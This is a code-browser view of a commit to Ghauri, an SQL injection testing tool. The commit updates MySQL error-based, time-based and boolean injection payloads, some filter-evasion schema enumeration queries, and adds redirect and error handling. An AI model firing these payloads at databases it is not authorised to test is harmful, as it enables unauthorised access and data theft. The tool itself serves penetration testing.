Projects STRLCPY ghauri Commits 2cbdbeca
🤬
  • Ghauri v1.1, updated code quality, improved boolean based injection detection, added proper error handling in case of Microsoft Access DBMS is identified (fixed #34), added proper redirect handling on user demand, in case injection is in redirect responses.

  • Loading...
  • r0oth3x49 committed 1 year ago
    2cbdbeca
    1 parent 2b97bf0a
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    ghauri/__init__.py
    skipped 23 lines
    24 24   
    25 25  """
    26 26   
    27  -__version__ = "1.0.9"
     27 +__version__ = "1.1"
    28 28  __author__ = "Nasir Khan (r0ot h3x49)"
    29 29  __license__ = "MIT"
    30 30  __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
    skipped 2 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/config.py
    skipped 35 lines
    36 36   is_string=False,
    37 37   is_json=False,
    38 38   is_multipart=False,
    39  - skip_urlencodig=False,
     39 + skip_urlencoding=False,
    40 40   filepaths=None,
    41 41   proxy=None,
    42 42   text_only=False,
    skipped 10 lines
    53 53   backend=None,
    54 54   batch=False,
    55 55   continue_on_http_error=False,
     56 + follow_redirects=None,
    56 57   ):
    57 58   self.vectors = vectors
    58 59   self.is_string = is_string
    59 60   self.is_json = is_json
    60 61   self.is_multipart = is_multipart
    61  - self.skip_urlencodig = skip_urlencodig
     62 + self.skip_urlencoding = skip_urlencoding
    62 63   self.filepaths = filepaths
    63 64   self._session_filepath = None
    64 65   self.proxy = proxy
    skipped 12 lines
    77 78   self.delay = delay
    78 79   self.timesec = timesec
    79 80   self.continue_on_http_error = continue_on_http_error
     81 + self.follow_redirects = follow_redirects
    80 82   
    81 83   @property
    82 84   def session_filepath(self):
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 174 lines
    175 175   {"pref": ") ", "suf": "-- wXyW"},
    176 176   {"pref": "') ", "suf": "-- wXyW"},
    177 177   {"pref": '") ', "suf": "-- wXyW"},
    178  - {"pref": "' ", "suf": " OR '04586'='4586--"},
    179  - {"pref": '" ', "suf": ' OR "04586"="4586--'},
     178 + {"pref": "' ", "suf": " OR '04586'='4586"},
     179 + {"pref": '" ', "suf": ' OR "04586"="4586'},
    180 180   {"pref": ") ", "suf": " AND (04586=4586"},
    181 181   {"pref": ") ", "suf": " OR (04586=4586"},
    182 182   {"pref": "') ", "suf": " AND ('04586'='4586"},
    skipped 217 lines
    400 400   ],
    401 401   "time-based": [
    402 402   {
    403  - "payload": "(SELECT(1)FROM(SELECT(SLEEP([SLEEPTIME])))a)",
     403 + "payload": "(SELECT(0)FROM(SELECT(SLEEP([SLEEPTIME])))a)",
    404 404   "comments": [
    405 405   {"pref": "'XOR", "suf": "XOR'Z"},
    406 406   {"pref": '"XOR', "suf": 'XOR"Z'},
    skipped 18 lines
    425 425   # {"pref": '")AND', "suf": 'AND("1"="1-- wXyW'},
    426 426   ],
    427 427   "title": "MySQL >= 5.0.12 time-based blind (query SLEEP)",
    428  - "vector": "(SELECT(1)FROM(SELECT(IF([INFERENCE],SLEEP([SLEEPTIME]),0)))a)",
     428 + "vector": "(SELECT(0)FROM(SELECT(IF([INFERENCE],SLEEP([SLEEPTIME]),0)))a)",
    429 429   "dbms": "MySQL",
    430 430   },
    431 431   {
    skipped 333 lines
    765 765   "dbms": "MySQL",
    766 766   },
    767 767   {
    768  - "payload": "AND UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)",
     768 + "payload": "UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)",
    769 769   "comments": [
    770  - # {"pref": " ", "suf": ""},
    771  - {"pref": " ", "suf": "-- wXyW"},
    772  - {"pref": " ", "suf": "#"},
     770 + {"pref": "", "suf": ""},
     771 + {"pref": "(", "suf": ")"},
     772 + {"pref": " AND ", "suf": "-- wXyW"},
     773 + {"pref": " AND ", "suf": "#"},
    773 774   # {"pref": "' ", "suf": ""},
    774  - {"pref": "' ", "suf": "-- wXyW"},
    775  - {"pref": "' ", "suf": "#"},
     775 + {"pref": "' AND ", "suf": "-- wXyW"},
     776 + {"pref": "' AND ", "suf": "#"},
    776 777   # {"pref": '" ', "suf": ""},
    777  - {"pref": '" ', "suf": "-- wXyW"},
    778  - {"pref": '" ', "suf": "#"},
     778 + {"pref": '" AND ', "suf": "-- wXyW"},
     779 + {"pref": '" AND ', "suf": "#"},
    779 780   # {"pref": ") ", "suf": ""},
    780  - {"pref": ") ", "suf": "-- wXyW"},
    781  - {"pref": ") ", "suf": "#"},
     781 + {"pref": ") AND ", "suf": "-- wXyW"},
     782 + {"pref": ") AND ", "suf": "#"},
    782 783   # {"pref": "') ", "suf": ""},
    783  - {"pref": "') ", "suf": "-- wXyW"},
    784  - {"pref": "') ", "suf": "#"},
     784 + {"pref": "') AND ", "suf": "-- wXyW"},
     785 + {"pref": "') AND ", "suf": "#"},
    785 786   # {"pref": '") ', "suf": ""},
    786  - {"pref": '") ', "suf": "-- wXyW"},
    787  - {"pref": '") ', "suf": "#"},
     787 + {"pref": '") AND ', "suf": "-- wXyW"},
     788 + {"pref": '") AND ', "suf": "#"},
    788 789   ],
    789 790   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
    790  - "vector": "AND UPDATEXML(0,CONCAT(0x28,0x7e,[INFERENCE],0x7e),0)",
     791 + "vector": "UPDATEXML(0,CONCAT(0x7e,[INFERENCE],0x7e),0)",
    791 792   "dbms": "MySQL",
    792 793   },
    793 794   {
    794  - "payload": "AND EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))",
     795 + "payload": "EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))",
    795 796   "comments": [
    796  - # {"pref": " ", "suf": ""},
    797  - {"pref": " ", "suf": "-- wXyW"},
    798  - {"pref": " ", "suf": "#"},
     797 + {"pref": "", "suf": ""},
     798 + {"pref": "(", "suf": ")"},
     799 + {"pref": " AND ", "suf": "-- wXyW"},
     800 + {"pref": " AND ", "suf": "#"},
    799 801   # {"pref": "' ", "suf": ""},
    800  - {"pref": "' ", "suf": "-- wXyW"},
    801  - {"pref": "' ", "suf": "#"},
     802 + {"pref": "' AND ", "suf": "-- wXyW"},
     803 + {"pref": "' AND ", "suf": "#"},
    802 804   # {"pref": '" ', "suf": ""},
    803  - {"pref": '" ', "suf": "-- wXyW"},
    804  - {"pref": '" ', "suf": "#"},
     805 + {"pref": '" AND ', "suf": "-- wXyW"},
     806 + {"pref": '" AND ', "suf": "#"},
    805 807   # {"pref": ") ", "suf": ""},
    806  - {"pref": ") ", "suf": "-- wXyW"},
    807  - {"pref": ") ", "suf": "#"},
     808 + {"pref": ") AND ", "suf": "-- wXyW"},
     809 + {"pref": ") AND ", "suf": "#"},
    808 810   # {"pref": "') ", "suf": ""},
    809  - {"pref": "') ", "suf": "-- wXyW"},
    810  - {"pref": "') ", "suf": "#"},
     811 + {"pref": "') AND ", "suf": "-- wXyW"},
     812 + {"pref": "') AND ", "suf": "#"},
    811 813   # {"pref": '") ', "suf": ""},
    812  - {"pref": '") ', "suf": "-- wXyW"},
    813  - {"pref": '") ', "suf": "#"},
     814 + {"pref": '") AND ', "suf": "-- wXyW"},
     815 + {"pref": '") AND ', "suf": "#"},
    814 816   ],
    815 817   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)",
    816  - "vector": "AND EXTRACTVALUE(0,CONCAT(0x7e,[INFERENCE],0x7e))",
     818 + "vector": "EXTRACTVALUE(0,CONCAT(0x7e,[INFERENCE],0x7e))",
    817 819   "dbms": "MySQL",
    818 820   },
    819 821   {
    skipped 23 lines
    843 845   "dbms": "MySQL",
    844 846   },
    845 847   {
    846  - "payload": "AND UPDATEXML(0,CONCAT_WS('r0oth3x49'),0)",
     848 + "payload": "AND UPDATEXML(0,CONCAT_WS('(', '~','r0oth3x49','~'),0)",
    847 849   "comments": [
    848 850   # {"pref": " ", "suf": ""},
    849 851   {"pref": " ", "suf": "-- wXyW"},
    skipped 123 lines
    973 975   "dbms": "MySQL",
    974 976   },
    975 977   {
    976  - "payload": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e))",
     978 + "payload": "EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e))",
    977 979   "comments": [
    978  - # {"pref": " ", "suf": ""},
    979  - {"pref": " ", "suf": "-- wXyW"},
    980  - {"pref": " ", "suf": "#"},
     980 + {"pref": "", "suf": ""},
     981 + {"pref": "(", "suf": ")"},
     982 + {"pref": " AND ", "suf": "-- wXyW"},
     983 + {"pref": " AND ", "suf": "#"},
    981 984   # {"pref": "' ", "suf": ""},
    982  - {"pref": "' ", "suf": "-- wXyW"},
    983  - {"pref": "' ", "suf": "#"},
     985 + {"pref": "' AND ", "suf": "-- wXyW"},
     986 + {"pref": "' AND ", "suf": "#"},
    984 987   # {"pref": '" ', "suf": ""},
    985  - {"pref": '" ', "suf": "-- wXyW"},
    986  - {"pref": '" ', "suf": "#"},
     988 + {"pref": '" AND ', "suf": "-- wXyW"},
     989 + {"pref": '" AND ', "suf": "#"},
    987 990   # {"pref": ") ", "suf": ""},
    988  - {"pref": ") ", "suf": "-- wXyW"},
    989  - {"pref": ") ", "suf": "#"},
     991 + {"pref": ") AND ", "suf": "-- wXyW"},
     992 + {"pref": ") AND ", "suf": "#"},
    990 993   # {"pref": "') ", "suf": ""},
    991  - {"pref": "') ", "suf": "-- wXyW"},
    992  - {"pref": "') ", "suf": "#"},
     994 + {"pref": "') AND ", "suf": "-- wXyW"},
     995 + {"pref": "') AND ", "suf": "#"},
    993 996   # {"pref": '") ', "suf": ""},
    994  - {"pref": '") ', "suf": "-- wXyW"},
    995  - {"pref": '") ', "suf": "#"},
     997 + {"pref": '") AND ', "suf": "-- wXyW"},
     998 + {"pref": '") AND ', "suf": "#"},
    996 999   ],
    997 1000   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)",
    998  - "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
     1001 + "vector": "EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    999 1002   "dbms": "MySQL",
    1000 1003   },
    1001 1004   {
    skipped 19 lines
    1021 1024   {"pref": '") ', "suf": "#"},
    1022 1025   ],
    1023 1026   "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)",
    1024  - "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
     1027 + "vector": "OR EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    1025 1028   "dbms": "MySQL",
    1026 1029   },
    1027 1030   # {
    skipped 769 lines
    1797 1800  PAYLOADS_DBS_COUNT = {
    1798 1801   "MySQL": [
    1799 1802   "(SELECT COUNT(*)FROM(INFORMATION_SCHEMA.SCHEMATA))",
    1800  - "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))",
    1801 1803   "(/*!50000SELECT*/ COUNT(*)/*!50000FROM*//*!50000(INFORMATION_SCHEMA.SCHEMATA)*/)",
    1802 1804   "(/*!50000SELECT*/ COUNT(*)/*!50000FROM*/(/*!50000INFORMATION_SCHEMA*/./*!50000SCHEMATA*/))",
     1805 + # "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))",
    1803 1806   ],
    1804 1807   "PostgreSQL": [
    1805 1808   "(SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables)",
    skipped 30 lines
    1836 1839   "(SELECT IFNULL(SCHEMA_NAME,0x20) FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1837 1840   "(SELECT CONCAT(SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1838 1841   "(SELECT CONCAT/**_**/(SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1839  - "(/*!SELECT*//**_**/CONCAT/**_**/(/*!50000SCHEMA_NAME*/)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))LIMIT 0,1",
    1840 1842   "(SELECT CONCAT_WS(0x28,0x7e,SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1841 1843   "(/*!SELECT*/ CONCAT_WS(0x28,0x7e,/*!SCHEMA_NAME*/)FROM(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/)LIMIT/**_**/0,1)",
     1844 + # "(/*!SELECT*//**_**/CONCAT/**_**/(/*!50000SCHEMA_NAME*/)/**_**/FROM/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/)%23LIMIT 0,1)",
    1842 1845   ],
    1843 1846   "PostgreSQL": [
    1844 1847   "(SELECT DISTINCT(schemaname) FROM pg_tables ORDER BY schemaname OFFSET 0 LIMIT 1)",
    skipped 208 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/utils.py
    skipped 154 lines
    155 155   
    156 156  class SmartRedirectHandler(HTTPRedirectHandler):
    157 157   def http_error_302(self, req, fp, code, msg, headers):
    158  - infourl = addinfourl(fp, headers, req.get_full_url())
    159  - infourl.status = code
    160  - infourl.code = code
     158 + infourl = addinfourl(fp, headers, req.get_full_url(), code=code)
     159 + redirect_url = headers.get("Location")
     160 + if not urlparse(redirect_url).netloc:
     161 + redirect_url = urljoin(req.get_full_url(), redirect_url)
     162 + if conf.follow_redirects == None:
     163 + choice = logger.read_input(
     164 + f"got a {code} redirect to '{redirect_url}'. Do you want to follow? [Y/n] ",
     165 + batch=False,
     166 + user_input="Y",
     167 + )
     168 + if choice and choice == "y":
     169 + conf.follow_redirects = True
     170 + if choice and choice == "n":
     171 + conf.follow_redirects = False
    161 172   return infourl
    162 173   
    163 174   http_error_301 = http_error_303 = http_error_307 = http_error_302
    skipped 512 lines
    676 687   difference = candidate
    677 688   is_vulner = True
    678 689   break
     690 + # in case when ratio true/false payload is not equal but no suggested --string or --not-string is found.
     691 + if (
     692 + not difference
     693 + and conf.match_ratio
     694 + and conf.match_ratio != ratio_true
     695 + ):
     696 + is_vulner = True
     697 + case = "Match Ratio"
    679 698   if difference and is_vulner:
    680 699   string = difference
    681 700   not_string = ""
    skipped 70 lines
    752 771   and injection_type not in ["HEADER", "COOKIE"]
    753 772   and not is_multipart
    754 773   ):
    755  - if not conf.skip_urlencodig:
     774 + if not conf.skip_urlencoding:
    756 775   _temp = quote(value, safe=safe)
    757  - if conf.skip_urlencodig:
     776 + if conf.skip_urlencoding:
    758 777   if not conf.is_multipart and not conf.is_json:
    759 778   _temp = value.replace(" ", "+")
    760 779   return _temp
    skipped 460 lines
    1221 1240   prepared_payload = re.sub(
    1222 1241   REGEX_MULTIPART_INJECTION, "\\1\\2\\3%s\\4" % (payload), text
    1223 1242   )
    1224  - logger.debug(f"prepared payload: {prepared_payload}")
     1243 + # logger.debug(f"prepared payload: {prepared_payload}")
    1225 1244   return prepared_payload
    1226 1245   
    1227 1246   
    skipped 56 lines
    1284 1303   
    1285 1304  def fetch_payloads_by_suffix_prefix(payloads, prefix=None, suffix=None):
    1286 1305   _temp = []
    1287  - if not prefix and not suffix:
     1306 + # logger.debug(f"prefix=({prefix}), suffix=({suffix})")
     1307 + Payload = collections.namedtuple("Payload", ["prefix", "suffix", "string", "raw"])
     1308 + if prefix == "" and suffix == "":
     1309 + payload = payloads[-1].raw
     1310 + _temp = [
     1311 + Payload(
     1312 + prefix=prefix,
     1313 + suffix=suffix,
     1314 + string=f"{prefix}{payload}{suffix}",
     1315 + raw=payload,
     1316 + )
     1317 + ]
     1318 + if prefix == None and suffix == None:
    1288 1319   _temp = payloads
    1289  - Payload = collections.namedtuple("Payload", ["prefix", "suffix", "string", "raw"])
    1290 1320   if prefix and not suffix:
    1291 1321   for entry in payloads:
    1292 1322   prefix = urldecode(prefix)
    skipped 5 lines
    1298 1328   # logger.debug(f"skipping payload '{entry.raw}'")
    1299 1329   if _pref and prefix and _pref[0] == prefix[0]:
    1300 1330   _temp.append(entry)
    1301  - # we should try all the suffix for now
    1302  - # if suffix and not prefix:
    1303  - # for entry in payloads:
    1304  - # suffix = urldecode(suffix)
    1305  - # _suff = entry.suffix
    1306  - # if _suff != suffix:
    1307  - # logger.debug(f"skipping payload '{entry.raw}'")
    1308  - # if _suff == suffix:
    1309  - # _temp.append(entry)
     1331 + # we should try all the prefix for now
     1332 + if suffix and not prefix:
     1333 + for entry in payloads:
     1334 + suffix = urldecode(suffix)
     1335 + _suff = entry.suffix
     1336 + # if suffix not in _suff:
     1337 + # logger.debug(f"skipping payload '{entry.raw}'")
     1338 + if suffix in _suff:
     1339 + _temp.append(entry)
    1310 1340   if prefix and suffix:
    1311 1341   # logger.debug(
    1312 1342   # f" both prefix and suffix are found for injection.. '{prefix}', '{suffix}'"
    skipped 7 lines
    1320 1350   # if not _temp:
    1321 1351   payload = payloads[-1].raw
    1322 1352   if prefix and prefix[-1] in [")", "'", '"']:
    1323  - prefix += " "
     1353 + if not prefix.endswith(" "):
     1354 + prefix += " "
    1324 1355   _temp = [
    1325 1356   Payload(
    1326 1357   prefix=prefix,
    skipped 458 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/core/extract.py
    skipped 66 lines
    67 67   """aa"""
    68 68   
    69 69   def __init__(
    70  - self, vectors="", is_string=False, skip_urlencodig=False, filepaths=None
     70 + self, vectors="", is_string=False, skip_urlencoding=False, filepaths=None
    71 71   ):
    72 72   self.vectors = vectors
    73 73   self.is_string = is_string
    74  - self.skip_urlencodig = skip_urlencodig
     74 + self.skip_urlencoding = skip_urlencoding
    75 75   self.filepaths = filepaths
    76 76   
    77 77   def _check_operator(
    skipped 2051 lines
  • ■ ■ ■ ■ ■
    ghauri/core/request.py
    skipped 48 lines
    49 49   SmartRedirectHandler,
    50 50  )
    51 51  from ghauri.logger.colored_logger import logger
     52 +from ghauri.common.config import conf
    52 53   
    53 54   
    54 55  class HTTPRequestHandler:
    skipped 68 lines
    123 124   handlers = []
    124 125   if proxy:
    125 126   handlers.append(proxy)
    126  - if not follow_redirects:
     127 + if conf.follow_redirects == None:
    127 128   handlers.append(SmartRedirectHandler())
     129 + if not conf.follow_redirects:
     130 + if len(handlers) == 1:
     131 + handlers.append(SmartRedirectHandler())
     132 + if not handlers:
     133 + handlers.append(SmartRedirectHandler())
    128 134   opener = build_opener(*handlers)
    129  - # opener.addheaders = custom_headers
    130 135   request = Request(url=url, headers=custom_headers)
    131 136   response = opener.open(request, timeout=timeout)
    132 137   else:
    skipped 47 lines
    180 185   handlers = []
    181 186   if proxy:
    182 187   handlers.append(proxy)
    183  - if not follow_redirects:
     188 + if conf.follow_redirects == None:
    184 189   handlers.append(SmartRedirectHandler())
     190 + if not conf.follow_redirects:
     191 + if len(handlers) == 1:
     192 + handlers.append(SmartRedirectHandler())
     193 + if not handlers:
     194 + handlers.append(SmartRedirectHandler())
    185 195   opener = build_opener(*handlers)
    186 196   request = Request(url=url, data=post_data, headers=custom_headers)
    187 197   response = opener.open(request, timeout=timeout)
    skipped 78 lines
  • ■ ■ ■ ■ ■
    ghauri/core/tests.py
    skipped 158 lines
    159 159   html = attack.filtered_text
    160 160   retval = search_possible_dbms_errors(html=attack.text)
    161 161   if retval.possible_dbms:
     162 + if attack.status_code in [302, 301, 303, 307]:
     163 + logger.debug(
     164 + f"SQL error detected in {attack.status_code} redirect response page."
     165 + )
    162 166   _possible_dbms = retval.possible_dbms
    163 167   possible_dbms = f"{mc}{_possible_dbms}{nc}"
    164 168   _it = injection_type
    skipped 304 lines
    469 473   blind_payloads = fetch_db_specific_payload(booleanbased_only=True)
    470 474   if dbms:
    471 475   dbms_specific_boolean_payloads = fetch_db_specific_payload(
    472  - booleanbased_only=True, dbms=dbms
     476 + booleanbased_only=True, dbms=dbms or possible_dbms
    473 477   )
    474 478   blind_payloads.extend(dbms_specific_boolean_payloads)
    475 479   param_key = parameter.get("key")
    skipped 19 lines
    495 499   payloads=entry.payloads, prefix=prefix, suffix=suffix
    496 500   )
    497 501   total_payloads = len(payloads)
     502 + if possible_dbms or dbms:
     503 + if entry.dbms and entry.dbms not in [possible_dbms, dbms]:
     504 + logger.debug(f"skipping '{entry.title}'")
     505 + continue
    498 506   logger.info(f"testing '{entry.title}'")
    499 507   while index_of_payload < total_payloads:
    500 508   if http_firewall_code_counter > 2 and not conf.continue_on_http_error:
    skipped 432 lines
    933 941   retry=3,
    934 942   techniques="T",
    935 943   code=None,
     944 + possible_dbms=None,
    936 945  ):
    937 946   Response = collections.namedtuple(
    938 947   "SQLi",
    skipped 62 lines
    1001 1010   payloads=entry.payloads, prefix=prefix, suffix=suffix
    1002 1011   )
    1003 1012   total_payloads = len(payloads)
     1013 + if possible_dbms or dbms:
     1014 + if entry.dbms and entry.dbms not in [possible_dbms, dbms]:
     1015 + logger.debug(f"skipping '{entry.title}'")
     1016 + continue
    1004 1017   logger.info(f"testing '{entry.title}'")
    1005 1018   while index_of_payload < total_payloads:
    1006 1019   if http_firewall_code_counter > 2 and not conf.continue_on_http_error:
    skipped 1039 lines
    2046 2059   if number_of_requests_performed == 4:
    2047 2060   number_of_requests_performed += bsqli.number_of_requests
    2048 2061   if "T" in techniques or "S" in techniques:
    2049  - if not dbms and possible_dbms:
    2050  - dbms = possible_dbms
    2051 2062   tsqli = check_timebased_sqli(
    2052 2063   base,
    2053 2064   parameter,
    skipped 13 lines
    2067 2078   is_json=is_json,
    2068 2079   retry=retries,
    2069 2080   techniques=techniques,
     2081 + possible_dbms=possible_dbms,
    2070 2082   )
    2071 2083   if tsqli and isinstance(tsqli, str) and tsqli == "next parameter":
    2072 2084   return None
    skipped 288 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/ghauri.py
    skipped 373 lines
    374 374   vector = vectors.get("boolean_vector")
    375 375   if not vector:
    376 376   vector = vectors.get("time_vector")
     377 + if backend == "Microsoft Access":
     378 + logger.warning(
     379 + "ghauri currently only supports DBMS fingerprint payloads for Microsoft Access, exfiltration will be added soon"
     380 + )
     381 + logger.info(
     382 + f"fetched data logged to text files under '{filepaths.filepath}'"
     383 + )
     384 + logger.end("ending")
     385 + exit(1)
    377 386   return GhauriResponse(
    378 387   url=url,
    379 388   data=data,
    skipped 409 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/scripts/ghauri.py
    skipped 286 lines
    287 287   "Enumeration",
    288 288   description=(
    289 289   "These options can be used to enumerate the back-end database"
    290  - "\nmanagment system information, structure and data contained in the\ntables."
     290 + "\nmanagement system information, structure and data contained in the\ntables."
    291 291   ),
    292 292   )
    293 293   enumeration.add_argument(
    skipped 70 lines
    364 364   "--start",
    365 365   dest="limitstart",
    366 366   type=int,
    367  - help="Retrive entries from offset for dbs/tables/columns/dump",
     367 + help="Retrieve entries from offset for dbs/tables/columns/dump",
    368 368   default=0,
    369 369   metavar="",
    370 370   )
    skipped 1 lines
    372 372   "--stop",
    373 373   dest="limitstop",
    374 374   type=int,
    375  - help="Retrive entries till offset for dbs/tables/columns/dump",
     375 + help="Retrieve entries till offset for dbs/tables/columns/dump",
    376 376   default=None,
    377 377   metavar="",
    378 378   )
    skipped 116 lines
Please wait...
Page is in error, reload to recover